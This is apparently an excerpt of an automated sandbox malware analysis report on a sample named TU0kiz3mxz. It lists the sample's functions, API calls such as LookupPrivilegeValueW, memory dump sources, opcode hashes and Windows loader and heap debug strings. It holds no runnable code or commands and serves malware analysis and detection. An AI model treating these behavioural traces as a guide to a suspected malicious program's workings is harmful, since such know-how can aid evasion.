                                                                                                                      Function 0041A630 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 295 41a630-41a661 call 41af20 RtlFreeHeap
                                                                                                                      APIs
                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3298025750-0
                                                                                                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                      • Instruction ID: a31e03847b69acb9206512889bce5d114748d47cfafea9ced6338f279cce3475
                                                                                                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                      • Instruction Fuzzy Hash: 64E04FB12002046BD714DF59DC45EE777ADEF88754F014559FD0857241C630F910CAF0
                                                                                                                      Function 0041A790 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 298 41a790-41a7a9 299 41a7af-41a7c4 LookupPrivilegeValueW 298->299 300 41a7aa call 41af20 298->300 300->299
                                                                                                                      APIs
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: LookupPrivilegeValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3899507212-0
                                                                                                                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                      • Instruction ID: b8658252b81b08ed33e4a874e4d8f80b0614426e32f2ee3a7d9107b08e04f012
                                                                                                                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                      • Instruction Fuzzy Hash: 9EE01AB12002086BDB10DF49DC85EE737ADAF88654F018155BA0857241C934E8118BF5
                                                                                                                      Function 0041A666 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 621844428-0
                                                                                                                      • Opcode ID: 9379220829e3c419878ff4888d194fe66dd23624891254af377271388a777a72
                                                                                                                      • Instruction ID: fd19ce839db182b36b6e96dd962a584e924bd8999524a3a1af9ee6c2b89418f0
                                                                                                                      • Opcode Fuzzy Hash: 9379220829e3c419878ff4888d194fe66dd23624891254af377271388a777a72
                                                                                                                      • Instruction Fuzzy Hash: ECE08C716012047BC320DFA8CC85FC73BA99F48754F11846AF96D6B241C530EA008BE1
                                                                                                                      Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 621844428-0
                                                                                                                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                      • Instruction ID: 94fb8da58e6992106aa2b0ab061ea4c6965e877b66759b154152d16d38dd5c99
                                                                                                                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                      • Instruction Fuzzy Hash: B9D017726002187BD620EB99DC85FD777ACDF487A4F0180AABA1C6B242C531FA108AE1
                                                                                                                      Function 01102C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 34271d13c2c1128d0679c8ec2b9e1848096a999c70827aa7eba769305cb73600
                                                                                                                      • Instruction ID: 667783eb17faf009446a6db66f3c8b2c6db4a6e8c89cde7a9fb29c8e752d30ae
                                                                                                                      • Opcode Fuzzy Hash: 34271d13c2c1128d0679c8ec2b9e1848096a999c70827aa7eba769305cb73600
                                                                                                                      • Instruction Fuzzy Hash: 7BB09B72D415C5C6DA16E764570C717790077D1701F25C075D2030685F8778C1D1E275

                                                                                                                      Non-executed Functions

                                                                                                                      Function 01178D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01178DA3
                                                                                                                      • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01178F26
                                                                                                                      • The instruction at %p tried to %s , xrefs: 01178F66
                                                                                                                      • The critical section is owned by thread %p., xrefs: 01178E69
                                                                                                                      • The resource is owned shared by %d threads, xrefs: 01178E2E
                                                                                                                      • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01178FEF
                                                                                                                      • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01178F2D
                                                                                                                      • <unknown>, xrefs: 01178D2E, 01178D81, 01178E00, 01178E49, 01178EC7, 01178F3E
                                                                                                                      • read from, xrefs: 01178F5D, 01178F62
                                                                                                                      • This failed because of error %Ix., xrefs: 01178EF6
                                                                                                                      • an invalid address, %p, xrefs: 01178F7F
                                                                                                                      • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01178E4B
                                                                                                                      • *** Inpage error in %ws:%s, xrefs: 01178EC8
                                                                                                                      • *** enter .cxr %p for the context, xrefs: 01178FBD
                                                                                                                      • The instruction at %p referenced memory at %p., xrefs: 01178EE2
                                                                                                                      • write to, xrefs: 01178F56
                                                                                                                      • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01178F34
                                                                                                                      • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01178E86
                                                                                                                      • *** Resource timeout (%p) in %ws:%s, xrefs: 01178E02
                                                                                                                      • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01178DC4
                                                                                                                      • The resource is owned exclusively by thread %p, xrefs: 01178E24
                                                                                                                      • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01178E3F
                                                                                                                      • *** An Access Violation occurred in %ws:%s, xrefs: 01178F3F
                                                                                                                      • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01178DB5
                                                                                                                      • a NULL pointer, xrefs: 01178F90
                                                                                                                      • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01178D8C
                                                                                                                      • *** enter .exr %p for the exception record, xrefs: 01178FA1
                                                                                                                      • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01178DD3
                                                                                                                      • *** then kb to get the faulting stack, xrefs: 01178FCC
                                                                                                                      • Go determine why that thread has not released the critical section., xrefs: 01178E75
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                                      • API String ID: 0-108210295
                                                                                                                      • Opcode ID: 7e714f7635efd3b1325f3b78597071bcfb961652dd14c2e8f19f89afdf17b6bb
                                                                                                                      • Instruction ID: e73718836fe4afcd2c349f782018b60d690a9e2c6e36126d81b7a5bb78b1292e
                                                                                                                      • Opcode Fuzzy Hash: 7e714f7635efd3b1325f3b78597071bcfb961652dd14c2e8f19f89afdf17b6bb
                                                                                                                      • Instruction Fuzzy Hash: 9B81E479B40215BFDB2EAA19DC89DAB3F35EF56B54F010048F248AF352E7718912C762
                                                                                                                      Function 01142349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-2160512332
                                                                                                                      • Opcode ID: f46e99cf4fdf0eb45a3bb949723dfab489fe2a0faeedccf5df6fc5c066d87870
                                                                                                                      • Instruction ID: 72d9557832db58db8c063178876e12c19de97fd84b5f83d3155cb4c81a1a36cd
                                                                                                                      • Opcode Fuzzy Hash: f46e99cf4fdf0eb45a3bb949723dfab489fe2a0faeedccf5df6fc5c066d87870
                                                                                                                      • Instruction Fuzzy Hash: 17928E71604742AFE729DF19D880FABB7E8BB84B54F04492DFA94D7250D770E884CB92
                                                                                                                      Function 010F8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • Address of the debug info found in the active list., xrefs: 011354AE, 011354FA
                                                                                                                      • Critical section address., xrefs: 01135502
                                                                                                                      • double initialized or corrupted critical section, xrefs: 01135508
                                                                                                                      • corrupted critical section, xrefs: 011354C2
                                                                                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0113540A, 01135496, 01135519
                                                                                                                      • undeleted critical section in freed memory, xrefs: 0113542B
                                                                                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011354CE
                                                                                                                      • Critical section address, xrefs: 01135425, 011354BC, 01135534
                                                                                                                      • Thread identifier, xrefs: 0113553A
                                                                                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011354E2
                                                                                                                      • 8, xrefs: 011352E3
                                                                                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 01135543
                                                                                                                      • Critical section debug info address, xrefs: 0113541F, 0113552E
                                                                                                                      • Invalid debug info address of this critical section, xrefs: 011354B6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                      • API String ID: 0-2368682639
                                                                                                                      • Opcode ID: 3704cc0e0f053906e1c6310aacda72b423739f73d2cc0a74b32c0a8a098664da
                                                                                                                      • Instruction ID: 62c780c157bc2cef7bcd422742a23cd9fac389810e31fe87a28dc7282ad97876
                                                                                                                      • Opcode Fuzzy Hash: 3704cc0e0f053906e1c6310aacda72b423739f73d2cc0a74b32c0a8a098664da
                                                                                                                      • Instruction Fuzzy Hash: 58819EB1A40349EFDB68CF99C845BEEBBB6BB48B14F50811AF544BB680D375A940CB50
                                                                                                                      Function 010F29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 011324C0
                                                                                                                      • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01132602
                                                                                                                      • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01132498
                                                                                                                      • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 011325EB
                                                                                                                      • RtlpResolveAssemblyStorageMapEntry, xrefs: 0113261F
                                                                                                                      • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01132506
                                                                                                                      • @, xrefs: 0113259B
                                                                                                                      • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 011322E4
                                                                                                                      • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01132409
                                                                                                                      • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01132624
                                                                                                                      • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01132412
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                      • API String ID: 0-4009184096
                                                                                                                      • Opcode ID: e47a2acc3578bd04b982fec5c10c3440b375a937bfd3acdd094cfb11aa024038
                                                                                                                      • Instruction ID: 9e3c4d930c0cbc607cb50ece130f3309cebea4ca5aa2bf45f229dd87b93b8807
                                                                                                                      • Opcode Fuzzy Hash: e47a2acc3578bd04b982fec5c10c3440b375a937bfd3acdd094cfb11aa024038
                                                                                                                      • Instruction Fuzzy Hash: 85027EF1D002299BDB25DB54CC81BDEB7B8AF44704F4041EAE749A7241EB70AE84CF99
                                                                                                                      Function 01168B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                      • API String ID: 0-2515994595
                                                                                                                      • Opcode ID: a4687c0f75ef6c8f467e1b9b4600ea16e736d6cce6b8afbeadf196d828a24795
                                                                                                                      • Instruction ID: 85e1424fc571a3fbf4b00e5df0cd0a9d7d61af5d3f339bdd0a73e5aa3d1d5929
                                                                                                                      • Opcode Fuzzy Hash: a4687c0f75ef6c8f467e1b9b4600ea16e736d6cce6b8afbeadf196d828a24795
                                                                                                                      • Instruction Fuzzy Hash: EC51EF715143019BC72DDF18C844BABBBECFFA8244F14491DEA98C7284E7B1D618CBA2
                                                                                                                      Function 010DAD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                                      • API String ID: 0-3197712848
                                                                                                                      • Opcode ID: b6682b0e8f697b1dbbc43fee5ffc59b1dbebee32e0830eb57bd0ede196cd3c04
                                                                                                                      • Instruction ID: a7326e8ed4bc7e8ce260e056f6f8fca30573d9742027c93f072da23606741bf5
                                                                                                                      • Opcode Fuzzy Hash: b6682b0e8f697b1dbbc43fee5ffc59b1dbebee32e0830eb57bd0ede196cd3c04
                                                                                                                      • Instruction Fuzzy Hash: D112F371A08352CFD729DF28C480BAABBE4BF95704F0549ADF9C58B291E734D944CB92
                                                                                                                      Function 01170274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                      • API String ID: 0-1700792311
                                                                                                                      • Opcode ID: 913e91e08bd327354fb8c64b9d080e45a18862b6335b94b7e6402fffdc64b029
                                                                                                                      • Instruction ID: ffc2855d4cdd807b773d4aaf49c85acf61b3be01ff40185fd86a117b11f2db48
                                                                                                                      • Opcode Fuzzy Hash: 913e91e08bd327354fb8c64b9d080e45a18862b6335b94b7e6402fffdc64b029
                                                                                                                      • Instruction Fuzzy Hash: C6D1EC31600786EFDB2ADF69C490AA9BBF1FF4A704F188059F4869B752C734E980CB14
                                                                                                                      Function 011489B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • HandleTraces, xrefs: 01148C8F
                                                                                                                      • VerifierDlls, xrefs: 01148CBD
                                                                                                                      • VerifierDebug, xrefs: 01148CA5
                                                                                                                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01148A67
                                                                                                                      • AVRF: -*- final list of providers -*- , xrefs: 01148B8F
                                                                                                                      • VerifierFlags, xrefs: 01148C50
                                                                                                                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01148A3D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                      • API String ID: 0-3223716464
                                                                                                                      • Opcode ID: 6ab3ec537347e3e4dbf5fe5fa886950ec54ff5d8b06f08df649226eb43e98a0b
                                                                                                                      • Instruction ID: 0a62a1d83cb1d3aa0c5288f87f17379eec03100a8d5c4ecb9a8bd747b1618da1
                                                                                                                      • Opcode Fuzzy Hash: 6ab3ec537347e3e4dbf5fe5fa886950ec54ff5d8b06f08df649226eb43e98a0b
                                                                                                                      • Instruction Fuzzy Hash: 5C9147B1A06306EFD72EEFA8C8C0B9B7BE5AB55F18F050468FA816B241C7709C41C795
                                                                                                                      Function 010CEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                      • API String ID: 0-1109411897
                                                                                                                      • Opcode ID: 8503aa8a14e5e358bb7784359d3261ca2ab58657dfb7fae6c0de18ac30cfabba
                                                                                                                      • Instruction ID: 6c576a21c4d5a32d32ed94806f0c6bd70d5d9b60c0e90f372600e8512cddb05e
                                                                                                                      • Opcode Fuzzy Hash: 8503aa8a14e5e358bb7784359d3261ca2ab58657dfb7fae6c0de18ac30cfabba
                                                                                                                      • Instruction Fuzzy Hash: BDA24874A0566A8FDB68DF18C8887ADBBB1BF45704F1442EED94DA7690DB309E81CF01
                                                                                                                      Function 010F63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-792281065
                                                                                                                      • Opcode ID: 96cc3ae89819b2a3b3cb3ca513110bf9417558e95d8a9a3fddb5d45f43974e39
                                                                                                                      • Instruction ID: bb122d0767eed827f1255b902a931de53011330c9a34c4de2877a98cbd88fb2b
                                                                                                                      • Opcode Fuzzy Hash: 96cc3ae89819b2a3b3cb3ca513110bf9417558e95d8a9a3fddb5d45f43974e39
                                                                                                                      • Instruction Fuzzy Hash: 12915D30B017119BDB3DEF58D885BAE7BA1BF91B18F04013CE6507BA85DB75A841C791
                                                                                                                      Function 010B645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • LdrpInitShimEngine, xrefs: 011199F4, 01119A07, 01119A30
                                                                                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01119A2A
                                                                                                                      • apphelp.dll, xrefs: 010B6496
                                                                                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01119A01
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01119A11, 01119A3A
                                                                                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 011199ED
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-204845295
                                                                                                                      • Opcode ID: 0d0b15382edea40880ea224e47963658991e7a646ea7fb3a816ed2803a99d519
                                                                                                                      • Instruction ID: b6ecafaff20d3bfd58c411c607e5d39bc88ef73859be617b9c3583112308b33e
                                                                                                                      • Opcode Fuzzy Hash: 0d0b15382edea40880ea224e47963658991e7a646ea7fb3a816ed2803a99d519
                                                                                                                      • Instruction Fuzzy Hash: CE51E3712183089FD728DF24D891BABB7E8FB84748F40092DF5E59B194D731E944CB92
                                                                                                                      Function 010F2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 01132165
                                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01132180
                                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01132178
                                                                                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0113219F
                                                                                                                      • RtlGetAssemblyStorageRoot, xrefs: 01132160, 0113219A, 011321BA
                                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 011321BF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
